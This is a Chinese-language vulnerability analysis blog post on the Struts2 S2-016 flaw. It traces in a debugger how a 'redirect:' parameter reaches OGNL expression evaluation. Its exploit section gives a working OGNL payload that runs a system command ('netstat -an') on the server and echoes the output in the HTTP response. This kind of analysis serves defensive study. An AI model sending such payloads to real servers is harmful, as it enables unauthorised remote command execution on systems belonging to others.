【漏洞分析】S2-016远程代码执行漏洞分析

原文链接:http://www.jianshu.com/p/de165430e8a8

0x01 前言

最近在学习java安全,第一个目标就是Struts了,准备找一些比较典型的Struts漏洞进行一系列的分析。

0x02 漏洞分析

首先到Struts2的官方文档中找一下S2-016漏洞的文档

7119304-2a480e2935e4db40.png
官方文档

看文档主要是找到该漏洞的版本,由图可知,该漏洞发生在Struts2.0.0 - Struts2.3.15,并且在Struts 2.3.15.1中得到修复,那么我们就将Struts 2.3.15和Struts 2.3.15.3两个版本的源码下载下载

使用Beyond Compare工具进行对比,注意要把比较时间戳的选项去掉

7119304-08128bb440be6c59.png

找了半天发现就一处不一样
/core/src/main/java/org/apache/struts2/dispatcher/mapper/DefaultActionMapper.java
7119304-392c7694320a21a8.png

通过对比,发现 REDIRECT_PREFIX、REDIRECT_ACTION_PREFIX被删掉了


7119304-ba0331b8382ffa48.png

同时他们配套的put方法也被删掉了


7119304-33caed2759710d99.png

还有一个就是action对应的put方法中添加了一个cleanActionName方法


7119304-9673d05d09339208.png

看了一下官方文档给的poc


7119304-646fd521a940dfc3.png

我选择在redirect配套的put方法中加断点,看看情况是如何的。


7119304-19f2c04b21594098.png

在这里,有一个匿名类的用法,同时声明并执行了一个execute函数,看一下监视器中的变量


7119304-839ba71bb79009d1.png

发现这里传入的key是
redirect:%{3*4}

也就是我传入的参数,那么这部分就是用户可控的地方。继续往下走setLocation方法就是这是重定向的值,最后把用户输入的重定向的值设置为result,result的一般在struts.xml中可以用标签来设置的,这里是用

?redirect:xxx

来设置的。
继续往下走,发现跳出了put方法


7119304-07943dd760a7f8c4.png

发现到了DefaultActionMapper类中的handleSpecialParameters函数中(这里可以记下来,如果后续没有思路的话可以回溯往上再找找看),此处我选择继续往下跟进。
多次step over和step into之后,发现跳到了StrutsPreparedAndExecuteFilter类的doFilter函数中,这个是Struts2的核心过滤器,每个请求都会到达这个类的这个函数中。


7119304-8aaa3e372f2bc765.png

step into execute.executeAction中看一下,其中该方法的参数,request和response没什么好说的,mapping是请求的参数,包括redierect的location、Action的名称、namespace等等,继续跟进发现进入Dispatcher类中
7119304-ce5e47137c1296a4.png

其中有一个result.execute,进去看看


7119304-12a2afddee33c5df.png

发现进入了ServletRedirectResult类的execute方法,其中还要进入他的父类ServletResultSupport的execute方法


7119304-704ada89327d5b66.png

继续跟进到conditionalParse方法中


7119304-19def22e6a6d01d5.png

进入到了StrutsResultSupport类中的conditionalParse方法,其中我们看到了translateVariables方法,这个方法其实就是一个可以执行ognl表达式的方法,继续分析一下
7119304-27c0544ed09a224a.png

getStack()方法返回的就是OgnlValueStack,而param是%{3*4}刚好是我们输入的参数,满足参数可控,继续跟进


7119304-37ff15725d6e1c79.png

进入到了TextParseUtil类中,我们看到第一个参数是
new char[]{'$','%'}

也就是说我们输入%{xxxx}或者${xxx}都可以执行
之后我们进入translateVariables方法中

7119304-b60116e5331300cc.png

执行到parser.evaluate的时候跟进入,函数源码如下:

public Object evaluate(char[] openChars, String expression, TextParseUtil.ParsedValueEvaluator evaluator, int maxLoopCount) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;
        int pos = 0;

        for (char open : openChars) {
            int loopCount = 1;
            //this creates an implicit StringBuffer and shouldn't be used in the inner loop
            final String lookupChars = open + "{";

            while (true) {
                int start = expression.indexOf(lookupChars, pos);
                if (start == -1) {
                    loopCount++;
                    start = expression.indexOf(lookupChars);
                }
                if (loopCount > maxLoopCount) {
                    // translateVariables prevent infinite loop / expression recursive evaluation
                    break;
                }
                int length = expression.length();
                int x = start + 2;
                int end;
                char c;
                int count = 1;
                //检查表达式中的格式是否是%{}或者${},‘{’或者‘}’不能多也不能少
                while (start != -1 && x < length && count != 0) {  
                    c = expression.charAt(x++);
                    if (c == '{') {
                        count++;
                    } else if (c == '}') {
                        count--;
                    }
                }
                end = x - 1;

                if ((start != -1) && (end != -1) && (count == 0)) {
                    String var = expression.substring(start + 2, end); //获取大括号中的内容

                    Object o = evaluator.evaluate(var);//执行了ognl表达式,返回结果

                    String left = expression.substring(0, start);
                    String right = expression.substring(end + 1);
                    String middle = null;
                    if (o != null) {
                        middle = o.toString();
                        if (StringUtils.isEmpty(left)) {
                            result = o;
                        } else {
                            result = left.concat(middle);
                        }

                        if (StringUtils.isNotEmpty(right)) {
                            result = result.toString().concat(right);
                        }

                        expression = left.concat(middle).concat(right);
                    } else {
                        // the variable doesn't exist, so don't display anything
                        expression = left.concat(right);
                        result = expression;
                    }
                    pos = (left != null && left.length() > 0 ? left.length() - 1: 0) +
                            (middle != null && middle.length() > 0 ? middle.length() - 1: 0) +
                            1;
                    pos = Math.max(pos, 1);
                } else {
                    break;
                }
            }
        }
        return result;
    }

当执行到这里,再次进入
7119304-35ef5aa797f51b72.png

一路跟进,发现最后由Ognl类的getValue执行了ognl表达式

7119304-79f0714958018edf.png

得到了结果12


7119304-f89b29520dc2e3bd.png

0x03 exp编写

${#a=new java.lang.ProcessBuilder(new java.lang.String[]{"netstat","-an"}).start().getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#screen=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#screen.println(#d),#screen.close()}

注意要进行url编码

0x04 总结

  • translateVariable能够执行ognl表达式
  • org.apache.struts2.dispatcher.StrutsResultSupport类中的conditionalParse能够解析ognl表达式
  • 所有的请求会到StrutsPreparedAndExecute类的doFilter中
  • exp中使用#content.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter().printnln()来回显
展开阅读全文

没有更多推荐了,返回首页